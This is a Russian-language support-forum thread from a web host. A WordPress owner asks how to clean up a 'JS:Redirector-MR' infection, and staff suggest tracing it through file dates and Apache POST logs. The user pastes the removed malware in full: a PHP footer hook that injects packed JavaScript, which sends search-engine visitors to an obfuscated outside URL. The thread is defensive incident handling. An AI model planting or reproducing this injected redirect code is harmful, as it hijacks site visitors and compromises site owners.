We use cookies
We use cookies to optimize our website. By continuing to browse the site, you agree to our use of cookies.
New design
Control panel
  • Русский
  • Українська
  • English
  • UAH
  • USD
  • RUB
  • EUR
  • 0-800-307-307 Hotline
  • +38 (044) 392-74-33 Kiev
  • +38 (057) 728-39-00 Kharkiv
  • +38 (056) 794-38-31 Dnipro
  • +38 (032) 229-58-93 Lviv
  • +38 (048) 738-57-70 Odessa
  • +38(093) 170-15-42  Life
  • +38 (067) 400-88-44 Kievstar
  • +1(888)393-24-51  USA, Toll free
  • +44(131)507-01-14  Great Britain
  • +7 (499) 348-28-61 Moscow

CMS WordPress. Вирус JS:Redirector-MR [Trj]

eleshevich.av
9 years old
0

Напала вот такая беда JS:Redirector-MR [Trj] аваст среагировал.
видоизменяла файлы в теме шаблола functions.php

(явно мне не припёрло редактировать шаблон в 4 утра)я сравнил изначальный код шаблона и вырезал вот такой кусок (вируса) и постави права на фаил только чтение

<?php
add_action('get_footer', 'add_sscounter');
function add_sscounter(){
echo '<!--scounter-->';
if(function_exists('is_user_logged_in')){
if(time()%2 == 0 && !is_user_logged_in()){
echo "<script language=\"JavaScript\">eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\\b'+e(c)+'\\\b','g'),k[c]);return p}('e r=x.9,t=\"\",q;4(r.3(\"m.\")!=-1)t=\"q\";4(r.3(\"7.\")!=-1)t=\"q\";4(r.3(\"8.\")!=-1)t=\"p\";4(r.3(\"a.\")!=-1)t=\"q\";4(r.3(\"f.\")!=-1)t=\"g\";4(r.3(\"j.\")!=-1)t=\"q\";4(t.6&&((q=r.3(\"?\"+t+\"=\"))!=-1||(q=r.3(\"&\"+t+\"=\"))!=-1))B.C=\"v\"+\"w\"+\":/\"+\"/A\"+\"b\"+\"k\"+\"5\"+\"h.\"+\"c\"+\"z/s\"+\"u\"+\"5\"+\"h.p\"+\"d?\"+\"t\"+\"y=1&t\"+\"i\"+\"l=\"+r.n(q+2+t.6).o(\"&\")[0];',39,39,'|||indexOf|if|rc|length|msn|yahoo|referrer|altavista|ogo|bi|hp|var|aol|query||er|ask|sea|ms|google|substring|split||||||ea|ht|tp|document|||go|window|location'.split('|'),0,{}))</script>";
}
}
}
?>


где он ещё мог прописаться?
и какие поставить плагины для безопасности? или кто чем поможет?

rudenko
9 years old
0

Как показывает практика плагины к CMS создают только дополнительные дыры. Те плагины с дырами, про которые мы знаем мы защищаем через настройки виртуального хоста, блокируя использование уязвимости злоумышленниками. В каждом конкретном случае нужно искать источник через который осуществляется заражение. Для этого нужно не трогать зараженный файл, а посмотреть дату его модификации, после чего проанализировать логи Apache за этот период и найти POST запросы, которые были сделаны в это время. Тогда вы сможете найти источник заражения.

eleshevich.av
9 years old
0

Илья, спасибо за ответ.
Подскажите как вышеописанное осуществить, писать тикет в техсапорт, мои два сайта были заражены в ночь с 30.01.11 на 31.01.11 (я быстро отреагировал точной даты модификации файла не сохранилось)

rudenko
9 years old
0

Есть два варианта - самостоятельно решить вопрос, либо написать в техподдержку с пометкой "для антивируса". Но это делать надо до того как вы изменили файл, так как в таком случае найти источник не сможем. Мы просто сейчас пишем небольшой антивирус, который проверяет некоторые распространенные уязвимости плюс есть система, которая определяет версии установленных CMS и закрывает дыры. Конечно гарантировать закрытие всех уязвимостей не можем, но если находим закономерность, то решаем этот вопрос.

The topic is closed.